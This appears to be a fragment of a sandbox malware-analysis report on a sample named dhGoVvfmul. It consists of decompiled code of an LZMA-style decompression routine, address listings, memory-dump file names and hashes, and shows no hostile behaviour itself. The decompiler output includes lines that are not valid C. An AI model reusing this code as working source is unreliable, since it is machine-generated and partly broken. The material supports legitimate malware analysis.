                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L102:
                          													_t339 = __ebp - 0x48;
                          													 *_t339 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t339;
                          													goto L103;
                          												} else {
                          													goto L100;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L109;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L124:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t415 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t415;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t415;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											L170:
                          											_push(0x22);
                          											_pop(_t567);
                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                          											_t535 = 0;
                          											L172:
                          											return _t535;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          						__eax =  *(__ebp - 0x50);
                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          						__eax =  *(__ebp - 0x58);
                          						__esi = __edx + __eax;
                          						 *(__ebp - 0x54) = __esi;
                          						__ax =  *__esi;
                          						__edi = __ax & 0x0000ffff;
                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          						if( *(__ebp - 0xc) >= __ecx) {
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          							__cx = __ax;
                          							__cx = __ax >> 5;
                          							__eax = __eax - __ecx;
                          							__edx = __edx + 1;
                          							 *__esi = __ax;
                          							 *(__ebp - 0x50) = __edx;
                          						} else {
                          							 *(__ebp - 0x10) = __ecx;
                          							0x800 = 0x800 - __edi;
                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          							 *__esi = __cx;
                          						}
                          						if( *(__ebp - 0x10) >= 0x1000000) {
                          							goto L148;
                          						} else {
                          							goto L146;
                          						}
                          					}
                          					goto L1;
                          				}
                          			}








                          0x00000000
                          0x00407234
                          0x00407234
                          0x00407238
                          0x0040725d
                          0x00407267
                          0x00000000
                          0x0040723a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407247
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00407328
                          0x00407328
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x004072e6
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00000000
                          0x0040746e
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x00000000
                          0x00406c8b
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x00000000
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fd6
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00000000
                          0x00407321
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00000000
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00407484
                          0x0040748a
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x004072e6
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x004073c3
                          0x00000000
                          0x00407238

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                          • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                          • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                          • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406F4A() {
                          				unsigned short _t532;
                          				signed int _t533;
                          				void _t534;
                          				void* _t535;
                          				signed int _t536;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						L89:
                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                          						L69:
                          						_t606 =  *(_t613 - 0x58);
                          						 *(_t613 - 0x84) = 0x12;
                          						L132:
                          						 *(_t613 - 0x54) = _t606;
                          						L133:
                          						_t532 =  *_t606;
                          						_t589 = _t532 & 0x0000ffff;
                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          						if( *(_t613 - 0xc) >= _t565) {
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          							 *(_t613 - 0x40) = 1;
                          							_t533 = _t532 - (_t532 >> 5);
                          							 *_t606 = _t533;
                          						} else {
                          							 *(_t613 - 0x10) = _t565;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                          						}
                          						if( *(_t613 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t534 =  *(_t613 - 0x84);
                          							L140:
                          							 *(_t613 - 0x88) = _t534;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						if( *(__ebp - 0x60) == 0) {
                          							L171:
                          							_t536 = _t535 | 0xffffffff;
                          							L172:
                          							return _t536;
                          						}
                          						__eax = 0;
                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          						0 | _t258 = _t258 + _t258 + 9;
                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          						L75:
                          						if( *(__ebp - 0x64) == 0) {
                          							 *(__ebp - 0x88) = 0x1b;
                          							L170:
                          							_t568 = 0x22;
                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          							_t536 = 0;
                          							goto L172;
                          						}
                          						__eax =  *(__ebp - 0x14);
                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          						if(__eax >=  *(__ebp - 0x74)) {
                          							__eax = __eax +  *(__ebp - 0x74);
                          						}
                          						__edx =  *(__ebp - 8);
                          						__cl =  *(__eax + __edx);
                          						__eax =  *(__ebp - 0x14);
                          						 *(__ebp - 0x5c) = __cl;
                          						 *(__eax + __edx) = __cl;
                          						__eax = __eax + 1;
                          						__edx = 0;
                          						_t274 = __eax %  *(__ebp - 0x74);
                          						__eax = __eax /  *(__ebp - 0x74);
                          						__edx = _t274;
                          						__eax =  *(__ebp - 0x68);
                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          						_t283 = __ebp - 0x64;
                          						 *_t283 =  *(__ebp - 0x64) - 1;
                          						 *( *(__ebp - 0x68)) = __cl;
                          						L79:
                          						 *(__ebp - 0x14) = __edx;
                          						L80:
                          						 *(__ebp - 0x88) = 2;
                          					}
                          					L1:
                          					_t535 =  *(_t613 - 0x88);
                          					if(_t535 > 0x1c) {
                          						goto L171;
                          					}
                          					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
                          						case 0:
                          							if( *(_t613 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t535 =  *( *(_t613 - 0x70));
                          							if(_t535 > 0xe1) {
                          								goto L171;
                          							}
                          							_t539 = _t535 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t609 = _t539 / _t570;
                          							_t541 = _t539 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t604 = _t541 % _t571 & 0x000000ff;
                          							 *(_t613 - 0x3c) = _t604;
                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          								L10:
                          								if(_t612 == 0) {
                          									L12:
                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t612 = _t612 - 1;
                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          								} while (_t612 != 0);
                          								goto L12;
                          							}
                          							if( *(_t613 - 4) != 0) {
                          								GlobalFree( *(_t613 - 4));
                          							}
